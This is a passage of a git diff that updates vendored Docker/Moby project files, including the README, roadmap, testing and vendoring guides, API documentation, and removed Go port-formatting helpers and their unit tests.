-  * *Cross-platform dependencies*. Modern applications often depend on
-    a combination of system libraries and binaries, language-specific
-    packages, framework-specific modules, internal components
-    developed for another project, etc. These dependencies live in
-    different "worlds" and require different tools - these tools
-    typically don't work well with each other, requiring awkward
-    custom integrations.
-
-  * *Conflicting dependencies*. Different applications may depend on
-    different versions of the same dependency. Packaging tools handle
-    these situations with various degrees of ease - but they all
-    handle them in different and incompatible ways, which again forces
-    the developer to do extra work.
-
-  * *Custom dependencies*. A developer may need to prepare a custom
-    version of their application's dependency. Some packaging systems
-    can handle custom versions of a dependency, others can't - and all
-    of them handle it differently.
-
-
-Docker solves the problem of dependency hell by giving the developer a simple
-way to express *all* their application's dependencies in one place, while
-streamlining the process of assembling them. If this makes you think of
-[XKCD 927](https://xkcd.com/927/), don't worry. Docker doesn't
-*replace* your favorite packaging systems. It simply orchestrates
-their use in a simple and repeatable way. How does it do that? With
-layers.
-
-Docker defines a build as running a sequence of Unix commands, one
-after the other, in the same container. Build commands modify the
-contents of the container (usually by installing new files on the
-filesystem), the next command modifies it some more, etc. Since each
-build command inherits the result of the previous commands, the
-*order* in which the commands are executed expresses *dependencies*.
-
-Here's a typical Docker build process:
-
-```bash
-FROM ubuntu:12.04
-RUN apt-get update && apt-get install -y python python-pip curl
-RUN curl -sSL https://github.com/shykes/helloflask/archive/master.tar.gz | tar -xzv
-RUN cd helloflask-master && pip install -r requirements.txt
-```
-
-Note that Docker doesn't care *how* dependencies are built - as long
-as they can be built by running a Unix command in a container.
-
-
-Getting started
-===============
-
-Docker can be installed either on your computer for building applications or
-on servers for running them. To get started, [check out the installation
-instructions in the
-documentation](https://docs.docker.com/engine/installation/).
-
-Usage examples
-==============
-
-Docker can be used to run short-lived commands, long-running daemons
-(app servers, databases, etc.), interactive shell sessions, etc.
-
-You can find a [list of real-world
-examples](https://docs.docker.com/engine/examples/) in the
-documentation.
-
-Under the hood
---------------
-
-Under the hood, Docker is built on the following components:
-
-* The
-  [cgroups](https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt)
-  and
-  [namespaces](http://man7.org/linux/man-pages/man7/namespaces.7.html)
-  capabilities of the Linux kernel
-* The [Go](https://golang.org) programming language
-* The [Docker Image Specification](https://github.com/docker/docker/blob/master/image/spec/v1.md)
-* The [Libcontainer Specification](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md)
-
-Contributing to Docker [![GoDoc](https://godoc.org/github.com/docker/docker?status.svg)](https://godoc.org/github.com/docker/docker)
-======================
-
-| **Master** (Linux) | **Experimental** (Linux) | **Windows** | **FreeBSD** |
-|------------------|----------------------|---------|---------|
-| [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master/) | [![Jenkins Build Status](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/badge/icon)](https://jenkins.dockerproject.org/view/Docker/job/Docker%20Master%20%28experimental%29/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(windows)/) | [![Build Status](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/badge/icon)](http://jenkins.dockerproject.org/job/Docker%20Master%20(freebsd)/) |
-
-Want to hack on Docker? Awesome! We have [instructions to help you get
-started contributing code or documentation](https://docs.docker.com/opensource/project/who-written-for/).
-
-These instructions are probably not perfect, please let us know if anything
-feels wrong or incomplete. Better yet, submit a PR and improve them yourself.
-
-Getting the development builds
-==============================
-
-Want to run Docker from a master build? You can download
-master builds at [master.dockerproject.org](https://master.dockerproject.org).
-They are updated with each commit merged into the master branch.
-
-Don't know how to use that super cool new feature in the master build? Check
-out the master docs at
-[docs.master.dockerproject.org](http://docs.master.dockerproject.org).
-
-How the project is run
-======================
-
-Docker is a very, very active project. If you want to learn more about how it is run,
-or want to get more involved, the best place to start is [the project directory](https://github.com/docker/docker/tree/master/project).
-
-We are always open to suggestions on process improvements, and are always looking for more maintainers.
-
-### Talking to other Docker users and contributors
-
-<table class="tg">
-  <col width="45%">
-  <col width="65%">
-  <tr>
-    <td>Internet&nbsp;Relay&nbsp;Chat&nbsp;(IRC)</td>
-    <td>
-      <p>
-        IRC is a direct line to our most knowledgeable Docker users; we have
-        both the  <code>#docker</code> and <code>#docker-dev</code> group on
-        <strong>irc.freenode.net</strong>.
-        IRC is a rich chat protocol but it can overwhelm new users. You can search
-        <a href="https://botbot.me/freenode/docker/#" target="_blank">our chat archives</a>.
-      </p>
-      Read our <a href="https://docs.docker.com/opensource/get-help/#/irc-quickstart" target="_blank">IRC quickstart guide</a> for an easy way to get started.
-    </td>
-  </tr>
-  <tr>
-    <td>Docker Community Forums</td>
-    <td>
-      The <a href="https://forums.docker.com/c/open-source-projects/de" target="_blank">Docker Engine</a>
-      group is for users of the Docker Engine project.
-    </td>
-  </tr>
-  <tr>
-    <td>Google Groups</td>
-    <td>
-      The <a href="https://groups.google.com/forum/#!forum/docker-dev"
-      target="_blank">docker-dev</a> group is for contributors and other people
-      contributing to the Docker project.  You can join this group without a
-      Google account by sending an email to <a
-      href="mailto:docker-dev+subscribe@googlegroups.com">docker-dev+subscribe@googlegroups.com</a>.
-      You'll receive a join-request message; simply reply to the message to
-      confirm your subscription.
-    </td>
-  </tr>
-  <tr>
-    <td>Twitter</td>
-    <td>
-      You can follow <a href="https://twitter.com/docker/" target="_blank">Docker's Twitter feed</a>
-      to get updates on our products. You can also tweet us questions or just
-      share blogs or stories.
-    </td>
-  </tr>
-  <tr>
-    <td>Stack Overflow</td>
-    <td>
-      Stack Overflow has over 7000 Docker questions listed. We regularly
-      monitor <a href="https://stackoverflow.com/search?tab=newest&q=docker" target="_blank">Docker questions</a>
-      and so do many other knowledgeable Docker users.
-    </td>
-  </tr>
-</table>
-
-### Legal
+Legal
+=====
 
 *Brought to you courtesy of our legal counsel. For more context,
-please see the [NOTICE](https://github.com/docker/docker/blob/master/NOTICE) document in this repo.*
+please see the [NOTICE](https://github.com/moby/moby/blob/master/NOTICE) document in this repo.*
 
-Use and transfer of Docker may be subject to certain restrictions by the
+Use and transfer of Moby may be subject to certain restrictions by the
 United States and other governments.
 
 It is your responsibility to ensure that your use and/or transfer does not
@@ -272,33 +50,8 @@ violate applicable laws.
 
 For more information, please see https://www.bis.doc.gov
 
-
 Licensing
 =========
-Docker is licensed under the Apache License, Version 2.0. See
-[LICENSE](https://github.com/docker/docker/blob/master/LICENSE) for the full
+Moby is licensed under the Apache License, Version 2.0. See
+[LICENSE](https://github.com/moby/moby/blob/master/LICENSE) for the full
 license text.
-
-Other Docker Related Projects
-=============================
-There are a number of projects under development that are based on Docker's
-core technology. These projects expand the tooling built around the
-Docker platform to broaden its application and utility.
-
-* [Docker Registry](https://github.com/docker/distribution): Registry
-server for Docker (hosting/delivery of repositories and images)
-* [Docker Machine](https://github.com/docker/machine): Machine management
-for a container-centric world
-* [Docker Swarm](https://github.com/docker/swarm): A Docker-native clustering
-system
-* [Docker Compose](https://github.com/docker/compose) (formerly Fig):
-Define and run multi-container apps
-* [Kitematic](https://github.com/docker/kitematic): The easiest way to use
-Docker on Mac and Windows
-
-If you know of another project underway that should be listed here, please help
-us keep this list up-to-date by submitting a PR.
-
-Awesome-Docker
-==============
-You can find more projects, tools and articles related to Docker on the [awesome-docker list](https://github.com/veggiemonk/awesome-docker). Add your project there.
diff --git a/vendor/github.com/docker/docker/ROADMAP.md b/vendor/github.com/docker/docker/ROADMAP.md
index 21fe06dba6..e2e6b2b960 100644
--- a/vendor/github.com/docker/docker/ROADMAP.md
+++ b/vendor/github.com/docker/docker/ROADMAP.md
@@ -1,118 +1,68 @@
-Docker Engine Roadmap
-=====================
+Moby Project Roadmap
+====================
 
 ### How should I use this document?
 
 This document provides description of items that the project decided to prioritize. This should
-serve as a reference point for Docker contributors to understand where the project is going, and
-help determine if a contribution could be conflicting with some longer terms plans.
+serve as a reference point for Moby contributors to understand where the project is going, and
+help determine if a contribution could be conflicting with some longer term plans.
 
 The fact that a feature isn't listed here doesn't mean that a patch for it will automatically be
-refused (except for those mentioned as "frozen features" below)! We are always happy to receive
-patches for new cool features we haven't thought about, or didn't judge priority. Please however
-understand that such patches might take longer for us to review.
+refused! We are always happy to receive patches for new cool features we haven't thought about,
+or didn't judge to be a priority. Please however understand that such patches might take longer
+for us to review.
 
 ### How can I help?
 
-Short term objectives are listed in the [wiki](https://github.com/docker/docker/wiki) and described
-in [Issues](https://github.com/docker/docker/issues?q=is%3Aopen+is%3Aissue+label%3Aroadmap). Our
+Short term objectives are listed in
+[Issues](https://github.com/moby/moby/issues?q=is%3Aopen+is%3Aissue+label%3Aroadmap). Our
 goal is to split down the workload in such way that anybody can jump in and help. Please comment on
-issues if you want to take it to avoid duplicating effort! Similarly, if a maintainer is already
-assigned on an issue you'd like to participate in, pinging him on IRC or GitHub to offer your help is
+issues if you want to work on it to avoid duplicating effort! Similarly, if a maintainer is already
+assigned on an issue you'd like to participate in, pinging him on GitHub to offer your help is
 the best way to go.
 
 ### How can I add something to the roadmap?
 
-The roadmap process is new to the Docker Engine: we are only beginning to structure and document the
+The roadmap process is new to the Moby Project: we are only beginning to structure and document the
 project objectives. Our immediate goal is to be more transparent, and work with our community to
 focus our efforts on fewer prioritized topics.
 
 We hope to offer in the near future a process allowing anyone to propose a topic to the roadmap, but
-we are not quite there yet. For the time being, the BDFL remains the keeper of the roadmap, and we
-won't be accepting pull requests adding or removing items from this file.
+we are not quite there yet. For the time being, it is best to discuss with the maintainers on an
+issue, in the Slack channel, or in person at the Moby Summits that happen every few months.
 
 # 1. Features and refactoring
 
 ## 1.1 Runtime improvements
 
-We recently introduced [`runC`](https://runc.io) as a standalone low-level tool for container
-execution. The initial goal was to integrate runC as a replacement in the Engine for the traditional
-default libcontainer `execdriver`, but the Engine internals were not ready for this.
+We introduced [`runC`](https://runc.io) as a standalone low-level tool for container
+execution in 2015, the first stage in spinning out parts of the Engine into standalone tools.
 
 As runC continued evolving, and the OCI specification along with it, we created
-[`containerd`](https://containerd.tools/), a daemon to control and monitor multiple `runC`. This is
-the new target for Engine integration, as it can entirely replace the whole `execdriver`
-architecture, and container monitoring along with it.
+[`containerd`](https://github.com/containerd/containerd), a daemon to control and monitor `runC`.
+In late 2016 this was relaunched as the `containerd` 1.0 track, aiming to provide a common runtime
+for the whole spectrum of container systems, including Kubernetes, with wide community support.
+This change meant that there was an increased scope for `containerd`, including image management
+and storage drivers.
 
-Docker Engine will rely on a long-running `containerd` companion daemon for all container execution
+Moby will rely on a long-running `containerd` companion daemon for all container execution
 related operations. This could open the door in the future for Engine restarts without interrupting
-running containers.
+running containers. The switch over to containerd 1.0 is an important goal for the project, and
+will result in a significant simplification of the functions implemented in this repository.
 
-## 1.2 Plugins improvements
+## 1.2 Internal decoupling
 
-Docker Engine 1.7.0 introduced plugin support, initially for the use cases of volumes and networks
-extensions. The plugin infrastructure was kept minimal as we were collecting use cases and real
-world feedback before optimizing for any particular workflow.
+A lot of work has been done in trying to decouple Moby internals. This process of creating
+standalone projects with a well defined function that attract a dedicated community should continue.
+As well as integrating `containerd` we would like to integrate [BuildKit](https://github.com/moby/buildkit)
+as the next standalone component.
 
-In the future, we'd like plugins to become first class citizens, and encourage an ecosystem of
-plugins. This implies in particular making it trivially easy to distribute plugins as containers
-through any Registry instance, as well as solving the commonly heard pain points of plugins needing
-to be treated as somewhat special (being active at all time, started before any other user
-containers, and not as easily dismissed).
+We see gRPC as the natural communication layer between decoupled components.
 
-## 1.3 Internal decoupling
+## 1.3 Custom assembly tooling
 
-A lot of work has been done in trying to decouple the Docker Engine's internals. In particular, the
-API implementation has been refactored, and the Builder side of the daemon is now
-[fully independent](https://github.com/docker/docker/tree/master/builder) while still residing in
-the same repository.
-
-We are exploring ways to go further with that decoupling, capitalizing on the work introduced by the
-runtime renovation and plugins improvement efforts. Indeed, the combination of `containerd` support
-with the concept of "special" containers opens the door for bootstrapping more Engine internals
-using the same facilities.
-
-## 1.4 Cluster capable Engine
-
-The community has been pushing for a more cluster capable Docker Engine, and a huge effort was spent
-adding features such as multihost networking, and node discovery down at the Engine level. Yet, the
-Engine is currently incapable of taking scheduling decisions alone, and continues relying on Swarm
-for that.
-
-We plan to complete this effort and make Engine fully cluster capable. Multiple instances of the
-Docker Engine being already capable of discovering each other and establish overlay networking for
-their container to communicate, the next step is for a given Engine to gain ability to dispatch work
-to another node in the cluster. This will be introduced in a backward compatible way, such that a
-`docker run` invocation on a particular node remains fully deterministic.
-
-# 2 Frozen features
-
-## 2.1 Docker exec
-
-We won't accept patches expanding the surface of `docker exec`, which we intend to keep as a
-*debugging* feature, as well as being strongly dependent on the Runtime ingredient effort.
-
-## 2.2 Remote Registry Operations
-
-A large amount of work is ongoing in the area of image distribution and provenance. This includes
-moving to the V2 Registry API and heavily refactoring the code that powers these features. The
-desired result is more secure, reliable and easier to use image distribution.
-
-Part of the problem with this part of the code base is the lack of a stable and flexible interface.
-If new features are added that access the registry without solidifying these interfaces, achieving
-feature parity will continue to be elusive. While we get a handle on this situation, we are imposing
-a moratorium on new code that accesses the Registry API in commands that don't already make remote
-calls.
-
-Currently, only the following commands cause interaction with a remote registry:
-
-  - push
-  - pull
-  - run
-  - build
-  - search
-  - login
-
-In the interest of stabilizing the registry access model during this ongoing work, we are not
-accepting additions to other commands that will cause remote interaction with the Registry API. This
-moratorium will lift when the goals of the distribution project have been met.
+We have been prototyping the Moby [assembly tool](https://github.com/moby/tool) which was originally
+developed for LinuxKit and intend to turn it into a more generic packaging and assembly mechanism
+that can build not only the default version of Moby, as distribution packages or other useful forms,
+but can also build very different container systems, themselves built of cooperating daemons built in
+and running in containers. We intend to merge this functionality into this repo.
diff --git a/vendor/github.com/docker/docker/TESTING.md b/vendor/github.com/docker/docker/TESTING.md
new file mode 100644
index 0000000000..34ad843638
--- /dev/null
+++ b/vendor/github.com/docker/docker/TESTING.md
@@ -0,0 +1,71 @@
+# Testing
+
+This document contains the Moby code testing guidelines. It should answer any 
+questions you may have as an aspiring Moby contributor.
+
+## Test suites
+
+Moby has two test suites (and one legacy test suite):
+
+* Unit tests - use standard `go test` and
+  [gotest.tools/assert](https://godoc.org/gotest.tools/assert) assertions. They are located in
+  the package they test. Unit tests should be fast and test only their own 
+  package.
+* API integration tests - use standard `go test` and
+  [gotest.tools/assert](https://godoc.org/gotest.tools/assert) assertions. They are located in
+  `./integration/<component>` directories, where `component` is: container,
+  image, volume, etc. These tests perform HTTP requests to an API endpoint and
+  check the HTTP response and daemon state after the call.
+
+The legacy test suite `integration-cli/` is deprecated. No new tests will be 
+added to this suite. Any tests in this suite which require updates should be 
+ported to either the unit test suite or the new API integration test suite.
+
+## Writing new tests
+
+Most code changes will fall into one of the following categories.
+
+### Writing tests for new features
+
+New code should be covered by unit tests. If the code is difficult to test with
+a unit tests then that is a good sign that it should be refactored to make it
+easier to reuse and maintain. Consider accepting unexported interfaces instead
+of structs so that fakes can be provided for dependencies.
+
+If the new feature includes a completely new API endpoint then a new API 
+integration test should be added to cover the success case of that endpoint.
+
+If the new feature does not include a completely new API endpoint consider 
+adding the new API fields to the existing test for that endpoint. A new 
+integration test should **not** be added for every new API field or API error 
+case. Error cases should be handled by unit tests.
+
+### Writing tests for bug fixes
+
+Bugs fixes should include a unit test case which exercises the bug.
+
+A bug fix may also include new assertions in an existing integration tests for the
+API endpoint.
+
+## Running tests
+
+To run the unit test suite:
+
+```
+make test-unit
+```
+
+or `hack/test/unit` from inside a `BINDDIR=. make shell` container or properly
+configured environment.
+
+The following environment variables may be used to run a subset of tests:
+
+* `TESTDIRS` - paths to directories to be tested, defaults to `./...`
+* `TESTFLAGS` - flags passed to `go test`, to run tests which match a pattern
+  use `TESTFLAGS="-test.run TestNameOrPrefix"`
+
+To run the integration test suite:
+
+```
+make test-integration
+```
diff --git a/vendor/github.com/docker/docker/VENDORING.md b/vendor/github.com/docker/docker/VENDORING.md
index 3086f9d172..8884f885a7 100644
--- a/vendor/github.com/docker/docker/VENDORING.md
+++ b/vendor/github.com/docker/docker/VENDORING.md
@@ -26,13 +26,14 @@ dependency on a package of a specific version or greater up to the next major
 release, without encountering breaking changes.
 
 ## Semantic Versioning
-Annotated version tags should follow Schema Versioning policies.
-According to http://semver.org:
+Annotated version tags should follow [Semantic Versioning](http://semver.org) policies:
 
 "Given a version number MAJOR.MINOR.PATCH, increment the:
-    MAJOR version when you make incompatible API changes,
-    MINOR version when you add functionality in a backwards-compatible manner, and
-    PATCH version when you make backwards-compatible bug fixes.
+
+   1. MAJOR version when you make incompatible API changes,
+   2. MINOR version when you add functionality in a backwards-compatible manner, and
+   3. PATCH version when you make backwards-compatible bug fixes.
+
 Additional labels for pre-release and build metadata are available as extensions
 to the MAJOR.MINOR.PATCH format."
 
diff --git a/vendor/github.com/docker/docker/VERSION b/vendor/github.com/docker/docker/VERSION
deleted file mode 100644
index b50dd27dd9..0000000000
--- a/vendor/github.com/docker/docker/VERSION
+++ /dev/null
@@ -1 +0,0 @@
-1.13.1
diff --git a/vendor/github.com/docker/docker/api/README.md b/vendor/github.com/docker/docker/api/README.md
index 464e056958..f136c3433a 100644
--- a/vendor/github.com/docker/docker/api/README.md
+++ b/vendor/github.com/docker/docker/api/README.md
@@ -10,17 +10,17 @@ It consists of various components in this repository:
 - `client/` The Go client used by the command-line client. It can also be used by third-party Go programs.
 - `daemon/` The daemon, which serves the API.
 
-## Swagger definition
+## Swagger definition
 
 The API is defined by the [Swagger](http://swagger.io/specification/) definition in `api/swagger.yaml`. This definition can be used to:
 
-1. To automatically generate documentation.
-2. To automatically generate the Go server and client. (A work-in-progress.)
+1. Automatically generate documentation.
+2. Automatically generate the Go server and client. (A work-in-progress.)
 3. Provide a machine readable version of the API for introspecting what it can do, automatically generating clients for other languages, etc.
 
 ## Updating the API documentation
 
-The API documentation is generated entirely from `api/swagger.yaml`. If you make updates to the API, you'll need to edit this file to represent the change in the documentation.
+The API documentation is generated entirely from `api/swagger.yaml`. If you make updates to the API, edit this file to represent the change in the documentation.
 
 The file is split into two main sections:
 
@@ -29,14 +29,14 @@ The file is split into two main sections:
 
 To make an edit, first look for the endpoint you want to edit under `paths`, then make the required edits. Endpoints may reference reusable objects with `$ref`, which can be found in the `definitions` section.
 
-There is hopefully enough example material in the file for you to copy a similar pattern from elsewhere in the file (e.g. adding new fields or endpoints), but for the full reference, see the [Swagger specification](https://github.com/docker/docker/issues/27919)
+There is hopefully enough example material in the file for you to copy a similar pattern from elsewhere in the file (e.g. adding new fields or endpoints), but for the full reference, see the [Swagger specification](https://github.com/docker/docker/issues/27919).
 
-`swagger.yaml` is validated by `hack/validate/swagger` to ensure it is a valid Swagger definition. This is useful for when you are making edits to ensure you are doing the right thing.
+`swagger.yaml` is validated by `hack/validate/swagger` to ensure it is a valid Swagger definition. This is useful when making edits to ensure you are doing the right thing.
 
 ## Viewing the API documentation
 
 When you make edits to `swagger.yaml`, you may want to check the generated API documentation to ensure it renders correctly.
 
-All the documentation generation is done in the documentation repository, [docker/docker.github.io](https://github.com/docker/docker.github.io). The Swagger definition is vendored periodically into this repository, but you can manually copy over the Swagger definition to test changes.
+Run `make swagger-docs` and a preview will be running at `http://localhost`. Some of the styling may be incorrect, but you'll be able to ensure that it is generating the correct documentation.
 
-Copy `api/swagger.yaml` in this repository to `engine/api/[VERSION_NUMBER]/swagger.yaml` in the documentation repository, overwriting what is already there. Then, run `docker-compose up` in the documentation repository and browse to [http://localhost:4000/engine/api/](http://localhost:4000/engine/api/) when it finishes rendering.
+The production documentation is generated by vendoring `swagger.yaml` into [docker/docker.github.io](https://github.com/docker/docker.github.io).
diff --git a/vendor/github.com/docker/docker/api/common.go b/vendor/github.com/docker/docker/api/common.go
index fd065d5abe..255a81aedd 100644
--- a/vendor/github.com/docker/docker/api/common.go
+++ b/vendor/github.com/docker/docker/api/common.go
@@ -1,166 +1,11 @@
-package api
-
-import (
-	"encoding/json"
-	"encoding/pem"
-	"fmt"
-	"mime"
-	"os"
-	"path/filepath"
-	"sort"
-	"strconv"
-	"strings"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/system"
-	"github.com/docker/libtrust"
-)
+package api // import "github.com/docker/docker/api"
 
 // Common constants for daemon and client.
 const (
 	// DefaultVersion of Current REST API
-	DefaultVersion string = "1.26"
+	DefaultVersion = "1.38"
 
 	// NoBaseImageSpecifier is the symbol used by the FROM
 	// command to specify that no base image is to be used.
-	NoBaseImageSpecifier string = "scratch"
+	NoBaseImageSpecifier = "scratch"
 )
-
-// byPortInfo is a temporary type used to sort types.Port by its fields
-type byPortInfo []types.Port
-
-func (r byPortInfo) Len() int      { return len(r) }
-func (r byPortInfo) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
-func (r byPortInfo) Less(i, j int) bool {
-	if r[i].PrivatePort != r[j].PrivatePort {
-		return r[i].PrivatePort < r[j].PrivatePort
-	}
-
-	if r[i].IP != r[j].IP {
-		return r[i].IP < r[j].IP
-	}
-
-	if r[i].PublicPort != r[j].PublicPort {
-		return r[i].PublicPort < r[j].PublicPort
-	}
-
-	return r[i].Type < r[j].Type
-}
-
-// DisplayablePorts returns formatted string representing open ports of container
-// e.g. "0.0.0.0:80->9090/tcp, 9988/tcp"
-// it's used by command 'docker ps'
-func DisplayablePorts(ports []types.Port) string {
-	type portGroup struct {
-		first uint16
-		last  uint16
-	}
-	groupMap := make(map[string]*portGroup)
-	var result []string
-	var hostMappings []string
-	var groupMapKeys []string
-	sort.Sort(byPortInfo(ports))
-	for _, port := range ports {
-		current := port.PrivatePort
-		portKey := port.Type
-		if port.IP != "" {
-			if port.PublicPort != current {
-				hostMappings = append(hostMappings, fmt.Sprintf("%s:%d->%d/%s", port.IP, port.PublicPort, port.PrivatePort, port.Type))
-				continue
-			}
-			portKey = fmt.Sprintf("%s/%s", port.IP, port.Type)
-		}
-		group := groupMap[portKey]
-
-		if group == nil {
-			groupMap[portKey] = &portGroup{first: current, last: current}
-			// record order that groupMap keys are created
-			groupMapKeys = append(groupMapKeys, portKey)
-			continue
-		}
-		if current == (group.last + 1) {
-			group.last = current
-			continue
-		}
-
-		result = append(result, formGroup(portKey, group.first, group.last))
-		groupMap[portKey] = &portGroup{first: current, last: current}
-	}
-	for _, portKey := range groupMapKeys {
-		g := groupMap[portKey]
-		result = append(result, formGroup(portKey, g.first, g.last))
-	}
-	result = append(result, hostMappings...)
-	return strings.Join(result, ", ")
-}
-
-func formGroup(key string, start, last uint16) string {
-	parts := strings.Split(key, "/")
-	groupType := parts[0]
-	var ip string
-	if len(parts) > 1 {
-		ip = parts[0]
-		groupType = parts[1]
-	}
-	group := strconv.Itoa(int(start))
-	if start != last {
-		group = fmt.Sprintf("%s-%d", group, last)
-	}
-	if ip != "" {
-		group = fmt.Sprintf("%s:%s->%s", ip, group, group)
-	}
-	return fmt.Sprintf("%s/%s", group, groupType)
-}
-
-// MatchesContentType validates the content type against the expected one
-func MatchesContentType(contentType, expectedType string) bool {
-	mimetype, _, err := mime.ParseMediaType(contentType)
-	if err != nil {
-		logrus.Errorf("Error parsing media type: %s error: %v", contentType, err)
-	}
-	return err == nil && mimetype == expectedType
-}
-
-// LoadOrCreateTrustKey attempts to load the libtrust key at the given path,
-// otherwise generates a new one
-func LoadOrCreateTrustKey(trustKeyPath string) (libtrust.PrivateKey, error) {
-	err := system.MkdirAll(filepath.Dir(trustKeyPath), 0700)
-	if err != nil {
-		return nil, err
-	}
-	trustKey, err := libtrust.LoadKeyFile(trustKeyPath)
-	if err == libtrust.ErrKeyFileDoesNotExist {
-		trustKey, err = libtrust.GenerateECP256PrivateKey()
-		if err != nil {
-			return nil, fmt.Errorf("Error generating key: %s", err)
-		}
-		encodedKey, err := serializePrivateKey(trustKey, filepath.Ext(trustKeyPath))
-		if err != nil {
-			return nil, fmt.Errorf("Error serializing key: %s", err)
-		}
-		if err := ioutils.AtomicWriteFile(trustKeyPath, encodedKey, os.FileMode(0600)); err != nil {
-			return nil, fmt.Errorf("Error saving key file: %s", err)
-		}
-	} else if err != nil {
-		return nil, fmt.Errorf("Error loading key file %s: %s", trustKeyPath, err)
-	}
-	return trustKey, nil
-}
-
-func serializePrivateKey(key libtrust.PrivateKey, ext string) (encoded []byte, err error) {
-	if ext == ".json" || ext == ".jwk" {
-		encoded, err = json.Marshal(key)
-		if err != nil {
-			return nil, fmt.Errorf("unable to encode private key JWK: %s", err)
-		}
-	} else {
-		pemBlock, err := key.PEMBlock()
-		if err != nil {
-			return nil, fmt.Errorf("unable to encode private key PEM: %s", err)
-		}
-		encoded = pem.EncodeToMemory(pemBlock)
-	}
-	return
-}
diff --git a/vendor/github.com/docker/docker/api/common_test.go b/vendor/github.com/docker/docker/api/common_test.go
deleted file mode 100644
index 31d6f58253..0000000000
--- a/vendor/github.com/docker/docker/api/common_test.go
+++ /dev/null
@@ -1,341 +0,0 @@
-package api
-
-import (
-	"io/ioutil"
-	"path/filepath"
-	"testing"
-
-	"os"
-
-	"github.com/docker/docker/api/types"
-)
-
-type ports struct {
-	ports    []types.Port
-	expected string
-}
-
-// DisplayablePorts
-func TestDisplayablePorts(t *testing.T) {
-	cases := []ports{
-		{
-			[]types.Port{
-				{
-					PrivatePort: 9988,
-					Type:        "tcp",
-				},
-			},
-			"9988/tcp"},
-		{
-			[]types.Port{
-				{
-					PrivatePort: 9988,
-					Type:        "udp",
-				},
-			},
-			"9988/udp",
-		},
-		{
-			[]types.Port{
-				{
-					IP:          "0.0.0.0",
-					PrivatePort: 9988,
-					Type:        "tcp",
-				},
-			},
-			"0.0.0.0:0->9988/tcp",
-		},
-		{
-			[]types.Port{
-				{
-					PrivatePort: 9988,
-					PublicPort:  8899,
-					Type:        "tcp",
-				},
-			},
-			"9988/tcp",
-		},
-		{
-			[]types.Port{
-				{
-					IP:          "4.3.2.1",
-					PrivatePort: 9988,
-					PublicPort:  8899,
-					Type:        "tcp",
-				},
-			},
-			"4.3.2.1:8899->9988/tcp",
-		},
-		{
-			[]types.Port{
-				{
-					IP:          "4.3.2.1",
-					PrivatePort: 9988,
-					PublicPort:  9988,
-					Type:        "tcp",
-				},
-			},
-			"4.3.2.1:9988->9988/tcp",
-		},
-		{
-			[]types.Port{
-				{
-					PrivatePort: 9988,
-					Type:        "udp",
-				}, {
-					PrivatePort: 9988,
-					Type:        "udp",
-				},
-			},
-			"9988/udp, 9988/udp",
-		},
-		{
-			[]types.Port{
-				{
-					IP:          "1.2.3.4",
-					PublicPort:  9998,
-					PrivatePort: 9998,
-					Type:        "udp",
-				}, {
-					IP:          "1.2.3.4",
-					PublicPort:  9999,
-					PrivatePort: 9999,
-					Type:        "udp",
-				},
-			},
-			"1.2.3.4:9998-9999->9998-9999/udp",
-		},
-		{
-			[]types.Port{
-				{
-					IP:          "1.2.3.4",
-					PublicPort:  8887,
-					PrivatePort: 9998,
-					Type:        "udp",
-				}, {
-					IP:          "1.2.3.4",
-					PublicPort:  8888,
-					PrivatePort: 9999,
-					Type:        "udp",
-				},
-			},
-			"1.2.3.4:8887->9998/udp, 1.2.3.4:8888->9999/udp",
-		},
-		{
-			[]types.Port{
-				{
-					PrivatePort: 9998,
-					Type:        "udp",
-				}, {
-					PrivatePort: 9999,
-					Type:        "udp",
-				},
-			},
-			"9998-9999/udp",
-		},
-		{
-			[]types.Port{
-				{
-					IP:          "1.2.3.4",
-					PrivatePort: 6677,
-					PublicPort:  7766,
-					Type:        "tcp",
-				}, {
-					PrivatePort: 9988,
-					PublicPort:  8899,
-					Type:        "udp",
-				},
-			},
-			"9988/udp, 1.2.3.4:7766->6677/tcp",
-		},
-		{
-			[]types.Port{
-				{
-					IP:          "1.2.3.4",
-					PrivatePort: 9988,
-					PublicPort:  8899,
-					Type:        "udp",
-				}, {
-					IP:          "1.2.3.4",
-					PrivatePort: 9988,
-					PublicPort:  8899,
-					Type:        "tcp",
-				}, {
-					IP:          "4.3.2.1",
-					PrivatePort: 2233,
-					PublicPort:  3322,
-					Type:        "tcp",
-				},
-			},
-			"4.3.2.1:3322->2233/tcp, 1.2.3.4:8899->9988/tcp, 1.2.3.4:8899->9988/udp",
-		},
-		{
-			[]types.Port{
-				{
-					PrivatePort: 9988,
-					PublicPort:  8899,
-					Type:        "udp",
-				}, {
-					IP:          "1.2.3.4",
-					PrivatePort: 6677,
-					PublicPort:  7766,
-					Type:        "tcp",
-				}, {
-					IP:          "4.3.2.1",
-					PrivatePort: 2233,
-					PublicPort:  3322,
-					Type:        "tcp",
-				},
-			},
-			"9988/udp, 4.3.2.1:3322->2233/tcp, 1.2.3.4:7766->6677/tcp",
-		},
-		{
-			[]types.Port{
-				{
-					PrivatePort: 80,
-					Type:        "tcp",
-				}, {
-					PrivatePort: 1024,
-					Type:        "tcp",
-				}, {
-					PrivatePort: 80,
-					Type:        "udp",
-				}, {
-					PrivatePort: 1024,
-					Type:        "udp",
-				}, {
-					IP:          "1.1.1.1",
-					PublicPort:  80,
-					PrivatePort: 1024,
-					Type:        "tcp",
-				}, {
-					IP:          "1.1.1.1",
-					PublicPort:  80,
-					PrivatePort: 1024,
-					Type:        "udp",
-				}, {
-					IP:          "1.1.1.1",
-					PublicPort:  1024,
-					PrivatePort: 80,
-					Type:        "tcp",
-				}, {
-					IP:          "1.1.1.1",
-					PublicPort:  1024,
-					PrivatePort: 80,
-					Type:        "udp",
-				}, {
-					IP:          "2.1.1.1",
-					PublicPort:  80,
-					PrivatePort: 1024,
-					Type:        "tcp",
-				}, {
-					IP:          "2.1.1.1",
-					PublicPort:  80,
